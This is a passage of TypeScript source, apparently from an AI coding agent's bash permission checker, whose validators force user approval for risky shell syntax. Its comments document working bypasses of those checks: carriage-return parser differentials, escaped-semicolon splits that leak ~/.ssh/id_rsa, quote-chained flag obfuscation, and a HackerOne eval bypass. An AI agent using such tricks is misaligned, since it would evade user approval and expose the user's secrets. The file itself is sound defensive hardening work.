  const { unquotedContent } = context
  const message =
    'Command contains shell metacharacters (;, |, or &) in arguments'

  if (/(?:^|\s)["'][^"']*[;&][^"']*["'](?:\s|$)/.test(unquotedContent)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.SHELL_METACHARACTERS,
      subId: 1,
    })
    return { behavior: 'ask', message }
  }

  const globPatterns = [
    /-name\s+["'][^"']*[;|&][^"']*["']/,
    /-path\s+["'][^"']*[;|&][^"']*["']/,
    /-iname\s+["'][^"']*[;|&][^"']*["']/,
  ]

  if (globPatterns.some(p => p.test(unquotedContent))) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.SHELL_METACHARACTERS,
      subId: 2,
    })
    return { behavior: 'ask', message }
  }

  if (/-regex\s+["'][^"']*[;&][^"']*["']/.test(unquotedContent)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.SHELL_METACHARACTERS,
      subId: 3,
    })
    return { behavior: 'ask', message }
  }

  return { behavior: 'passthrough', message: 'No metacharacters' }
}

/**
 * Asks when `fullyUnquotedContent` has a `$NAME` variable directly after
 * `<`, `>` or `|`, or directly before `|`, `<` or `>` (optional whitespace
 * in between).
 */
function validateDangerousVariables(
  context: ValidationContext,
): PermissionResult {
  const { fullyUnquotedContent } = context

  if (
    /[<>|]\s*\$[A-Za-z_]/.test(fullyUnquotedContent) ||
    /\$[A-Za-z_][A-Za-z0-9_]*\s*[|<>]/.test(fullyUnquotedContent)
  ) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.DANGEROUS_VARIABLES,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains variables in dangerous contexts (redirections or pipes)',
    }
  }

  return { behavior: 'passthrough', message: 'No dangerous variables' }
}

/**
 * Asks when `unquotedContent` contains an unescaped backtick or matches any
 * entry of COMMAND_SUBSTITUTION_PATTERNS; otherwise passes through.
 */
function validateDangerousPatterns(
  context: ValidationContext,
): PermissionResult {
  const { unquotedContent } = context

  // Special handling for backticks - check for UNESCAPED backticks only
  // Escaped backticks (e.g., \`) are safe and commonly used in SQL commands
  if (hasUnescapedChar(unquotedContent, '`')) {
    return {
      behavior: 'ask',
      message: 'Command contains backticks (`) for command substitution',
    }
  }

  // Other command substitution checks (include double-quoted content)
  for (const { pattern, message } of COMMAND_SUBSTITUTION_PATTERNS) {
    if (pattern.test(unquotedContent)) {
      logEvent('tengu_bash_security_check_triggered', {
        checkId:
          BASH_SECURITY_CHECK_IDS.DANGEROUS_PATTERNS_COMMAND_SUBSTITUTION,
        subId: 1,
      })
      return { behavior: 'ask', message: `Command contains ${message}` }
    }
  }

  return { behavior: 'passthrough', message: 'No dangerous patterns' }
}

function validateRedirections(context: ValidationContext): PermissionResult {
  const { fullyUnquotedContent } = context

  if (/</.test(fullyUnquotedContent)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.DANGEROUS_PATTERNS_INPUT_REDIRECTION,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains input redirection (<) which could read sensitive files',
    }
  }

  if (/>/.test(fullyUnquotedContent)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.DANGEROUS_PATTERNS_OUTPUT_REDIRECTION,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains output 
redirection (>) which could write to arbitrary files',899 }900 }901902 return { behavior: 'passthrough', message: 'No redirections' }903}904905function validateNewlines(context: ValidationContext): PermissionResult {906 // Use fullyUnquotedPreStrip (before stripSafeRedirections) to prevent bypasses907 // where stripping `>/dev/null` creates a phantom backslash-newline continuation.908 // E.g., `cmd \>/dev/null\nwhoami` → after stripping becomes `cmd \\nwhoami`909 // which looks like a safe continuation but actually hides a second command.910 const { fullyUnquotedPreStrip } = context911912 // Check for newlines in unquoted content913 if (!/[\n\r]/.test(fullyUnquotedPreStrip)) {914 return { behavior: 'passthrough', message: 'No newlines' }915 }916917 // Flag any newline/CR followed by non-whitespace, EXCEPT backslash-newline918 // continuations at word boundaries. In bash, `\<newline>` is a line919 // continuation (both chars removed), which is safe when the backslash920 // follows whitespace (e.g., `cmd \<newline>--flag`). Mid-word continuations921 // like `tr\<newline>aceroute` are still flagged because they can hide922 // dangerous command names from allowlist checks.923 // eslint-disable-next-line custom-rules/no-lookbehind-regex -- .test() + gated by /[\n\r]/.test() above924 const looksLikeCommand = /(?<![\s]\\)[\n\r]\s*\S/.test(fullyUnquotedPreStrip)925 if (looksLikeCommand) {926 logEvent('tengu_bash_security_check_triggered', {927 checkId: BASH_SECURITY_CHECK_IDS.NEWLINES,928 subId: 1,929 })930 return {931 behavior: 'ask',932 message:933 'Command contains newlines that could separate multiple commands',934 }935 }936937 return {938 behavior: 'passthrough',939 message: 'Newlines appear to be within data',940 }941}942943/**944 * SECURITY: Carriage return (\r, 0x0D) IS a misparsing concern, unlike LF.945 *946 * Parser differential:947 * - shell-quote's BAREWORD regex uses `[^\s...]` — JS `\s` INCLUDES \r, so948 * shell-quote treats CR as a token boundary. 
/**
 * SECURITY: Carriage return (\r, 0x0D) IS a misparsing concern, unlike LF.
 *
 * Parser differential:
 *   - shell-quote's BAREWORD regex uses `[^\s...]` — JS `\s` INCLUDES \r, so
 *     shell-quote treats CR as a token boundary. `TZ=UTC\recho` tokenizes as
 *     TWO tokens: ['TZ=UTC', 'echo']. splitCommand joins with space →
 *     'TZ=UTC echo curl evil.com'.
 *   - bash's default IFS = $' \t\n' — CR is NOT in IFS. bash sees
 *     `TZ=UTC\recho` as ONE word → env assignment TZ='UTC\recho' (CR byte
 *     inside value), then `curl` is the command.
 *
 * Attack: `TZ=UTC\recho curl evil.com` with Bash(echo:*)
 *   validator: splitCommand collapses CR→space → 'TZ=UTC echo curl evil.com'
 *     → stripSafeWrappers: TZ=UTC stripped → 'echo curl evil.com' matches rule
 *   bash: executes `curl evil.com`
 *
 * validateNewlines catches this but is in nonMisparsingValidators (LF is
 * correctly handled by both parsers). This validator is NOT in
 * nonMisparsingValidators — its ask result gets isBashSecurityCheckForMisparsing
 * and blocks at the bashPermissions gate.
 *
 * Checks originalCommand (not fullyUnquotedPreStrip) because CR inside single
 * quotes is ALSO a misparsing concern for the same reason: shell-quote's `\s`
 * still tokenizes it, but bash treats it as literal. Block ALL unquoted-or-SQ CR.
 * Only exception: CR inside DOUBLE quotes where bash also treats it as data
 * and shell-quote preserves the token (no split).
 */
function validateCarriageReturn(context: ValidationContext): PermissionResult {
  const { originalCommand } = context

  if (!originalCommand.includes('\r')) {
    return { behavior: 'passthrough', message: 'No carriage return' }
  }

  // Check if CR appears outside double quotes. CR outside DQ (including inside
  // SQ and unquoted) causes the shell-quote/bash tokenization differential.
  let inSingleQuote = false
  let inDoubleQuote = false
  let escaped = false
  for (let i = 0; i < originalCommand.length; i++) {
    const c = originalCommand[i]
    // The character right after an active backslash is consumed as data.
    if (escaped) {
      escaped = false
      continue
    }
    // Backslash is an escape everywhere except inside single quotes.
    if (c === '\\' && !inSingleQuote) {
      escaped = true
      continue
    }
    if (c === "'" && !inDoubleQuote) {
      inSingleQuote = !inSingleQuote
      continue
    }
    if (c === '"' && !inSingleQuote) {
      inDoubleQuote = !inDoubleQuote
      continue
    }
    if (c === '\r' && !inDoubleQuote) {
      logEvent('tengu_bash_security_check_triggered', {
        checkId: BASH_SECURITY_CHECK_IDS.NEWLINES,
        subId: 2,
      })
      return {
        behavior: 'ask',
        message:
          'Command contains carriage return (\\r) which shell-quote and bash tokenize differently',
      }
    }
  }

  return { behavior: 'passthrough', message: 'CR only inside double quotes' }
}

/**
 * Flags any use of the IFS variable, which could be used to bypass
 * regex-based validation.
 *
 * Matches `$IFS` and any `${...IFS...}` form, so parameter expansions such as
 * `${IFS:0:1}` and `${#IFS}` are covered as well.
 */
function validateIFSInjection(context: ValidationContext): PermissionResult {
  const { originalCommand } = context

  // `\$\{[^}]*IFS` catches every parameter-expansion variation that mentions
  // IFS before the closing brace.
  if (/\$IFS|\$\{[^}]*IFS/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.IFS_INJECTION,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains IFS variable usage which could bypass security validation',
    }
  }

  return { behavior: 'passthrough', message: 'No IFS injection detected' }
}
// Additional hardening against reading environment variables via /proc filesystem.
// Path validation typically blocks /proc access, but this provides defense-in-depth.
// Environment files in /proc can expose sensitive data like API keys and secrets.
function validateProcEnvironAccess(
  context: ValidationContext,
): PermissionResult {
  const { originalCommand } = context

  // Check for /proc paths that could expose environment variables.
  // This catches patterns like:
  //   - /proc/self/environ
  //   - /proc/1/environ
  //   - /proc/*/environ (with any PID)
  if (/\/proc\/.*\/environ/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.PROC_ENVIRON_ACCESS,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'Command accesses /proc/*/environ which could expose sensitive environment variables',
    }
  }

  return {
    behavior: 'passthrough',
    message: 'No /proc/environ access detected',
  }
}
/**
 * Detects commands with malformed tokens (unbalanced delimiters) combined with
 * command separators. This catches potential injection patterns where ambiguous
 * shell syntax could be exploited.
 *
 * Security: This check catches the eval bypass discovered in HackerOne review.
 * When shell-quote parses ambiguous patterns like `echo {"hi":"hi;evil"}`,
 * it may produce unbalanced tokens (e.g., `{hi:"hi`). Combined with command
 * separators, this can lead to unintended command execution via eval re-parsing.
 *
 * By forcing user approval for these patterns, we ensure the user sees exactly
 * what will be executed before approving.
 */
function validateMalformedTokenInjection(
  context: ValidationContext,
): PermissionResult {
  const { originalCommand } = context

  const parseResult = tryParseShellCommand(originalCommand)
  if (!parseResult.success) {
    // Parse failed - this is handled elsewhere (bashToolHasPermission checks this)
    return {
      behavior: 'passthrough',
      message: 'Parse failed, handled elsewhere',
    }
  }

  const parsed = parseResult.tokens

  // Check for command separators (;, &&, ||)
  const hasCommandSeparator = parsed.some(
    entry =>
      typeof entry === 'object' &&
      entry !== null &&
      'op' in entry &&
      (entry.op === ';' || entry.op === '&&' || entry.op === '||'),
  )

  if (!hasCommandSeparator) {
    return { behavior: 'passthrough', message: 'No command separators' }
  }

  // Check for malformed tokens (unbalanced delimiters)
  if (hasMalformedTokens(originalCommand, parsed)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.MALFORMED_TOKEN_INJECTION,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains ambiguous syntax with command separators that could be misinterpreted',
    }
  }

  return {
    behavior: 'passthrough',
    message: 'No malformed token injection detected',
  }
}

/**
 * Blocks shell-quoting tricks used to hide a flag from the regex-based
 * dangerous-flag checks (e.g. `"-"exec`, `$'-exec'`, `"""-f"`).
 *
 * The checks run in a fixed order: whole-command regexes first, then a
 * quote-aware scan of `originalCommand`, then two regexes over
 * `fullyUnquotedContent`. The first hit is logged and returned as `ask`;
 * otherwise the result is `passthrough`.
 */
function validateObfuscatedFlags(context: ValidationContext): PermissionResult {
  const { originalCommand, baseCommand } = context

  // Echo is safe for obfuscated flags, BUT only for simple echo commands.
  // For compound commands (with |, &, ;), we need to check the whole command
  // because the dangerous ANSI-C quoting might be after the operator.
  const hasShellOperators = /[|&;]/.test(originalCommand)
  if (baseCommand === 'echo' && !hasShellOperators) {
    return {
      behavior: 'passthrough',
      message: 'echo command is safe and has no dangerous flags',
    }
  }

  // COMPREHENSIVE OBFUSCATION DETECTION
  // These checks catch various ways to hide flags using shell quoting.

  // 1. Block ANSI-C quoting ($'...') - can encode any character via escape
  // sequences. Simple pattern that matches $'...' anywhere:
  //   - grep '$' file  => no match ($ inside quotes, no $'...' structure)
  //   - 'test'$'-exec' => match (quote concatenation with ANSI-C)
  // The pattern requires $' followed by content (can be empty) and a closing '.
  if (/\$'[^']*'/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 5,
    })
    return {
      behavior: 'ask',
      message: 'Command contains ANSI-C quoting which can hide characters',
    }
  }

  // 2. Block locale quoting ($"...") - can also use escape sequences.
  if (/\$"[^"]*"/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 6,
    })
    return {
      behavior: 'ask',
      message: 'Command contains locale quoting which can hide characters',
    }
  }

  // 3. Block empty ANSI-C or locale quotes followed by dash: $''-exec, $""-exec
  if (/\$['"]{2}\s*-/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 9,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains empty special quotes before dash (potential bypass)',
    }
  }

  // 4. Block ANY sequence of empty quotes followed by dash.
  // This catches: ''- ""- ''""- ""''- ''""''- etc. (one or more empty quote
  // pairs followed by optional whitespace and a dash).
  if (/(?:^|\s)(?:''|"")+\s*-/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 7,
    })
    return {
      behavior: 'ask',
      message: 'Command contains empty quotes before dash (potential bypass)',
    }
  }

  // 4b. SECURITY: Block homogeneous empty quote pair(s) immediately adjacent
  // to a quoted dash. Patterns like `"""-f"` (empty `""` + quoted `"-f"`)
  // concatenate in bash to `-f` but slip past all the other checks:
  //   - Regex (4) above matches the `""` pair, then expects optional space and
  //     a dash — but finds a third `"` instead. No match.
  //   - Quote-content scanner (below) sees the first `""` pair with empty
  //     content; the third `"` opens a new quoted region.
  //   - Quote-state tracker: `""` toggles inDoubleQuote on/off; the third `"`
  //     opens it again, so the `-` inside `"-f"` is INSIDE quotes → skipped.
  //   - Flag scanner looks for `\s` before `-`; here `-` is preceded by `"`.
  //   - fullyUnquotedContent: both `""` and `"-f"` get stripped.
  // This bypass works for ANY dangerous-flag check (jq -f, find -exec, fc -e)
  // with a matching prefix permission (Bash(jq:*), Bash(find:*)).
  //
  // The regex matches one or more HOMOGENEOUS empty pairs (`""` or `''`),
  // immediately followed by ANY quote char, immediately followed by `-`.
  //
  // POSITION-AGNOSTIC: word start is NOT required because prefixes like
  // `$x"""-f"` (unset/empty variable) concatenate the same way. The
  // homogeneous-empty-pair requirement filters out the `'"'"'` idiom.
  //
  // FALSE POSITIVE: matches `echo '"""-f" text'` (pattern inside a
  // single-quoted string). Extremely rare; acceptable.
  if (/(?:""|'')+['"]-/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 10,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains empty quote pair adjacent to quoted dash (potential flag obfuscation)',
    }
  }

  // 4c. SECURITY: Also block 3+ consecutive quotes at word start even without
  // an immediate dash. Broader safety net for multi-quote obfuscation patterns
  // not enumerated above (e.g., `"""x"-f` where content between quotes shifts
  // the dash position). Legitimate commands never need `"""x"` when `"x"` works.
  if (/(?:^|\s)['"]{3,}/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 11,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains consecutive quote characters at word start (potential obfuscation)',
    }
  }

  // Characters that can continue a flag after a closing quote. This catches:
  //   a-zA-Z0-9: "-"exec → -exec (direct concatenation)
  //   \\:        "-"\exec → -exec (backslash escape is stripped)
  //   -:         "-"-output → --output (extra dashes)
  //   {:         "-"{exec,delete} → -exec -delete (brace expansion)
  //   $:         "-"$VAR → -exec when VAR=exec (variable expansion)
  //   `:         "-"`echo exec` → -exec (command substitution)
  // Note: glob chars (*?[) are omitted — they require attacker-controlled
  // filenames in CWD to exploit, and blocking them would break patterns
  // like `ls -- "-"*` for listing files that start with dash.
  // Loop-invariant, so it is built once here rather than on every iteration.
  const FLAG_CONTINUATION_CHARS = /[a-zA-Z0-9\\${`-]/

  // Track quote state to avoid false positives for flags inside quoted strings
  let inSingleQuote = false
  let inDoubleQuote = false
  let escaped = false

  for (let i = 0; i < originalCommand.length - 1; i++) {
    const currentChar = originalCommand[i]
    const nextChar = originalCommand[i + 1]

    // Update quote state
    if (escaped) {
      escaped = false
      continue
    }

    // SECURITY: Only treat backslash as escape OUTSIDE single quotes. In bash,
    // `\` inside `'...'` is LITERAL. Without this guard, `'\'` desyncs the
    // quote tracker: `\` sets escaped=true and the closing `'` is consumed by
    // the escaped-skip above instead of toggling inSingleQuote. The tracker
    // then stays in single-quote mode and the "inside quotes → continue" guard
    // below skips ALL subsequent flag detection for the rest of the command.
    // Example: `jq '\' "-f" evil` — bash gets a `-f` arg, but a desynced
    // tracker thinks ` "-f" evil` is inside quotes → flag detection bypassed.
    // Defense-in-depth: hasShellQuoteSingleQuoteBug is expected to catch `'\'`
    // patterns before this runs, but the tracker is kept correct for
    // consistency with the other scanners in this file, which all guard with
    // `!inSingleQuote`.
    if (currentChar === '\\' && !inSingleQuote) {
      escaped = true
      continue
    }

    if (currentChar === "'" && !inDoubleQuote) {
      inSingleQuote = !inSingleQuote
      continue
    }

    if (currentChar === '"' && !inSingleQuote) {
      inDoubleQuote = !inDoubleQuote
      continue
    }

    // Only look for flags when not inside quoted strings.
    // This prevents false positives like: make test TEST="file.py -v"
    if (inSingleQuote || inDoubleQuote) {
      continue
    }

    // Look for whitespace followed by a quote that contains a dash (potential
    // flag obfuscation).
    // SECURITY: Block ANY quoted content starting with dash - err on side of safety.
    // Catches: "-"exec, "-file", "--flag", '-'output, etc.
    // Users can approve manually if legitimate (e.g., find . -name "-file")
    if (
      currentChar &&
      nextChar &&
      /\s/.test(currentChar) &&
      /['"`]/.test(nextChar)
    ) {
      const quoteChar = nextChar
      let j = i + 2 // Start after the opening quote
      let insideQuote = ''

      // Collect content inside the quote
      while (j < originalCommand.length && originalCommand[j] !== quoteChar) {
        insideQuote += originalCommand[j]!
        j++
      }

      // If we found a closing quote and the content looks like an obfuscated
      // flag, block it. Three attack patterns to catch:
      //   1. Flag name inside quotes: "--flag", "-exec", "-X"
      //   2. Split-quote flag: "-"exec, "--"output (letters continue after quote)
      //   3. Chained quotes: "-""exec" (dashes in first quote, letters in second)
      // Pure-dash strings like "---" or "--" followed by whitespace/separator
      // are separators, not flags, and should not trigger this check.
      const charAfterQuote = originalCommand[j + 1]
      // Inside double quotes, $VAR and `cmd` expand at runtime, so "-$VAR" can
      // become -exec. Blocking $ and ` here over-blocks single-quoted literals
      // like grep '-$' (where $ is literal); that is accepted as the safer side.
      // Brace expansion ({) does NOT happen inside quotes, so { is not needed here.
      const hasFlagCharsInside = /^-+[a-zA-Z0-9$`]/.test(insideQuote)
      const hasFlagCharsContinuing =
        /^-+$/.test(insideQuote) &&
        charAfterQuote !== undefined &&
        FLAG_CONTINUATION_CHARS.test(charAfterQuote)
      // Handle adjacent quote chaining: "-""exec" or "-""-"exec or """-"exec
      // concatenates to -exec in shell. Follow the chain of adjacent quoted
      // segments until one contains an alphanumeric char or a non-quote
      // boundary is hit. Also handles empty prefix quotes: """-"exec.
      const hasFlagCharsInNextQuote =
        // Trigger when: first segment is only dashes OR empty (could be prefix for flag)
        (insideQuote === '' || /^-+$/.test(insideQuote)) &&
        charAfterQuote !== undefined &&
        /['"`]/.test(charAfterQuote) &&
        (() => {
          let pos = j + 1 // Start at charAfterQuote (an opening quote)
          let combinedContent = insideQuote // Track what the shell will see
          while (
            pos < originalCommand.length &&
            /['"`]/.test(originalCommand[pos]!)
          ) {
            const segQuote = originalCommand[pos]!
            let end = pos + 1
            while (
              end < originalCommand.length &&
              originalCommand[end] !== segQuote
            ) {
              end++
            }
            const segment = originalCommand.slice(pos + 1, end)
            combinedContent += segment

            // Check if combined content so far forms a flag pattern.
            // Include $ and ` for in-quote expansion: "-""$VAR" → -exec
            if (/^-+[a-zA-Z0-9$`]/.test(combinedContent)) return true

            // If this segment has alphanumeric/expansion and we already have
            // dashes, it's a flag. Catches "-""$*" where segment='$*' has no
            // alnum but expands to positional params at runtime.
            // Guard against segment.length === 0: slice(0, -0) → slice(0, 0) → ''.
            const priorContent =
              segment.length > 0
                ? combinedContent.slice(0, -segment.length)
                : combinedContent
            if (/^-+$/.test(priorContent)) {
              if (/[a-zA-Z0-9$`]/.test(segment)) return true
            }

            if (end >= originalCommand.length) break // Unclosed quote
            pos = end + 1 // Move past closing quote to check next segment
          }
          // Also check the unquoted char at the end of the chain
          if (
            pos < originalCommand.length &&
            FLAG_CONTINUATION_CHARS.test(originalCommand[pos]!)
          ) {
            // If we have dashes in combined content, the trailing char completes a flag
            if (/^-+$/.test(combinedContent) || combinedContent === '') {
              const trailingChar = originalCommand[pos]!
              if (trailingChar === '-') {
                // More dashes, could still form a flag
                return true
              }
              if (
                /[a-zA-Z0-9\\${`]/.test(trailingChar) &&
                combinedContent !== ''
              ) {
                // We have dashes and now alphanumeric/expansion follows
                return true
              }
            }
            // Original check for dashes followed by alphanumeric
            if (/^-/.test(combinedContent)) {
              return true
            }
          }
          return false
        })()
      if (
        j < originalCommand.length &&
        originalCommand[j] === quoteChar &&
        (hasFlagCharsInside ||
          hasFlagCharsContinuing ||
          hasFlagCharsInNextQuote)
      ) {
        logEvent('tengu_bash_security_check_triggered', {
          checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
          subId: 4,
        })
        return {
          behavior: 'ask',
          message: 'Command contains quoted characters in flag names',
        }
      }
    }

    // Look for whitespace followed by dash - this starts a flag
    if (currentChar && nextChar && /\s/.test(currentChar) && nextChar === '-') {
      let j = i + 1 // Start at the dash
      let flagContent = ''

      // Collect flag content
      while (j < originalCommand.length) {
        const flagChar = originalCommand[j]
        if (!flagChar) break

        // End flag content once we hit whitespace or an equals sign
        if (/[\s=]/.test(flagChar)) {
          break
        }
        // End flag collection if we hit a quote followed by a non-flag
        // character. This handles cases like -d"," which should be parsed as
        // just -d.
        if (/['"`]/.test(flagChar)) {
          // Special case for cut -d: the delimiter value can be quoted.
          // Example: cut -d'"' should parse as flag name: -d, value: '"'
          // The exception is restricted to cut -d to avoid bypasses: without
          // it, `find -e"xec"` could be parsed as flag name -e, bypassing the
          // blocklist for -exec.
          if (baseCommand === 'cut' && flagContent === '-d') {
            // cut -d followed by a quoted delimiter - flagContent is already '-d'
            break
          }

          // Look ahead to see what follows the quote
          if (j + 1 < originalCommand.length) {
            const nextFlagChar = originalCommand[j + 1]
            if (nextFlagChar && !/[a-zA-Z0-9_'"-]/.test(nextFlagChar)) {
              // Quote followed by something that is clearly not part of a flag
              break
            }
          }
        }
        flagContent += flagChar
        j++
      }

      if (flagContent.includes('"') || flagContent.includes("'")) {
        logEvent('tengu_bash_security_check_triggered', {
          checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
          subId: 1,
        })
        return {
          behavior: 'ask',
          message: 'Command contains quoted characters in flag names',
        }
      }
    }
  }

  // Also handle flags that start with quotes: "--"output, '-'-output, etc.
  // Use fullyUnquotedContent to avoid false positives from legitimate quoted
  // content like echo "---"
  if (/\s['"`]-/.test(context.fullyUnquotedContent)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 2,
    })
    return {
      behavior: 'ask',
      message: 'Command contains quoted characters in flag names',
    }
  }

  // Also handles cases like ""--output
  // Use fullyUnquotedContent to avoid false positives from legitimate quoted content
  if (/['"`]{2}-/.test(context.fullyUnquotedContent)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 3,
    })
    return {
      behavior: 'ask',
      message: 'Command contains quoted characters in flag names',
    }
  }

  return { behavior: 'passthrough', message: 'No obfuscated flags detected' }
}

/**
 * Detects backslash-escaped whitespace characters (space, tab) outside of quotes.
 *
 * In bash, `echo\ test` is a single token (command named "echo test"), but
 * shell-quote decodes the escape and produces `echo test` (two separate tokens).
 * This discrepancy allows path traversal attacks like:
 *   echo\ test/../../../usr/bin/touch /tmp/file
 * which the parser sees as `echo test/.../touch /tmp/file` (an echo command)
 * but bash resolves as `/usr/bin/touch /tmp/file` (via directory "echo test").
 */
function hasBackslashEscapedWhitespace(command: string): boolean {
  let inSingleQuote = false
  let inDoubleQuote = false

  for (let i = 0; i < command.length; i++) {
    const char = command[i]

    if (char === '\\' && !inSingleQuote) {
      if (!inDoubleQuote) {
        const nextChar = command[i + 1]
        if (nextChar === ' ' || nextChar === '\t') {
          return true
        }
      }
      // Skip the escaped character (both outside quotes and inside double quotes,
      // where \\, \", \$, \` are valid escape sequences)
      i++
      continue
    }

    if (char === '"' && !inSingleQuote) {
      inDoubleQuote = !inDoubleQuote
      continue
    }

    if (char === "'" && !inDoubleQuote) {
      inSingleQuote = !inSingleQuote
      continue
    }
  }

  return false
}

/**
 * Validator wrapper around hasBackslashEscapedWhitespace: logs and returns
 * `ask` when the original command contains an unquoted `\ ` or `\<tab>`.
 */
function validateBackslashEscapedWhitespace(
  context: ValidationContext,
): PermissionResult {
  if (hasBackslashEscapedWhitespace(context.originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.BACKSLASH_ESCAPED_WHITESPACE,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains backslash-escaped whitespace that could alter command parsing',
    }
  }

  return {
    behavior: 'passthrough',
    message: 'No backslash-escaped whitespace',
  }
}
/**
 * Shell operators whose backslash-escaped form is flagged by
 * hasBackslashEscapedOperator.
 *
 * Note: `(` and `)` are NOT in this set — splitCommand preserves `\(` and `\)`
 * in its output (round-trip safe), so they don't trigger the double-parse bug.
 * This allows `find . \( -name x -o -name y \)` to pass without false positives.
 */
const SHELL_OPERATORS = new Set([';', '|', '&', '<', '>'])

/**
 * Detects a backslash immediately preceding a shell operator outside of quotes.
 *
 * SECURITY: splitCommand normalizes `\;` to a bare `;` in its output string.
 * When downstream code (checkReadOnlyConstraints, checkPathConstraints, etc.)
 * re-parses that normalized string, the bare `;` is seen as an operator and
 * causes a false split. This enables arbitrary file read bypassing path checks:
 *
 *   cat safe.txt \; echo ~/.ssh/id_rsa
 *
 * In bash: ONE cat command reading safe.txt, ;, echo, ~/.ssh/id_rsa as files.
 * After splitCommand normalizes: "cat safe.txt ; echo ~/.ssh/id_rsa"
 * Nested re-parse: ["cat safe.txt", "echo ~/.ssh/id_rsa"] — both segments
 * pass isCommandReadOnly, the sensitive path hidden in the echo segment is
 * never validated by path constraints. Auto-allowed. Private key leaked.
 *
 * Backslash parity: only an UNPAIRED backslash directly before the operator is
 * flagged. An odd count (`\;`, `\\\;`) leaves one backslash escaping the
 * operator, which is what triggers the double-parse bug. An even count (`\\;`)
 * is consumed as escaped-backslash pairs, leaving a real `;` that bash and
 * splitCommand both treat as a separator, so it is not flagged here.
 *
 * Known false positive: `find . -exec cmd {} \;` — users will be prompted once.
 */
function hasBackslashEscapedOperator(command: string): boolean {
  let inSingleQuote = false
  let inDoubleQuote = false

  for (let i = 0; i < command.length; i++) {
    const char = command[i]

    // SECURITY: Handle backslash FIRST, before quote toggles. In bash, inside
    // double quotes, `\"` is an escape sequence producing a literal `"` — it
    // does NOT close the quote. If quote toggles ran first, `\"` inside
    // `"..."` would desync the tracker:
    //   - `\` is ignored (gated by !inDoubleQuote)
    //   - `"` toggles inDoubleQuote to FALSE (wrong — bash says still inside)
    //   - next `"` (the real closing quote) toggles BACK to TRUE — locked desync
    //   - subsequent `\;` is missed because !inDoubleQuote is false
    // Exploit: `tac "x\"y" \; echo ~/.ssh/id_rsa` — bash runs ONE tac reading
    // all args as files (leaking id_rsa), but a desynced tracker misses `\;`
    // and splitCommand's double-parse normalization "sees" two safe commands.
    //
    // Same structure as hasBackslashEscapedWhitespace: backslash check first,
    // gated only by !inSingleQuote (backslash IS literal inside '...'), with
    // an unconditional i++ to skip the escaped char even inside double quotes.
    if (char === '\\' && !inSingleQuote) {
      // Only flag \<operator> when OUTSIDE double quotes (inside double quotes,
      // operators like ;|&<> are already not special, so \; is harmless there).
      if (!inDoubleQuote) {
        const nextChar = command[i + 1]
        if (nextChar && SHELL_OPERATORS.has(nextChar)) {
          return true
        }
      }
      // Skip the escaped character unconditionally. Inside double quotes this
      // correctly consumes backslash pairs: in `"x\\"` the first `\` skips the
      // second, then the closing `"` toggles inDoubleQuote off. Without the
      // unconditional skip, the second `\` would swallow the closing quote and
      // the tracker would stay inside double quotes forever, missing any later
      // `\;` outside quotes.
      // Exploit: `cat "x\\" \; echo /etc/passwd` — bash reads /etc/passwd.
      i++
      continue
    }

    // Quote toggles come AFTER backslash handling (backslash already skipped
    // any escaped quote char, so these toggles only fire on unescaped quotes).
    if (char === "'" && !inDoubleQuote) {
      inSingleQuote = !inSingleQuote
      continue
    }
    if (char === '"' && !inSingleQuote) {
      inDoubleQuote = !inDoubleQuote
      continue
    }
  }

  return false
}

/**
 * Validator wrapper around hasBackslashEscapedOperator.
 *
 * Returns `ask` when the original command contains an unquoted backslash
 * directly before `;`, `|`, `&`, `<` or `>`.
 */
function validateBackslashEscapedOperators(
  context: ValidationContext,
): PermissionResult {
  // Tree-sitter path: if tree-sitter confirms no actual operator nodes exist
  // in the AST, then any \; is just an escaped character in a word argument
  // (e.g., `find . -exec cmd {} \;`). Skip the character scan.
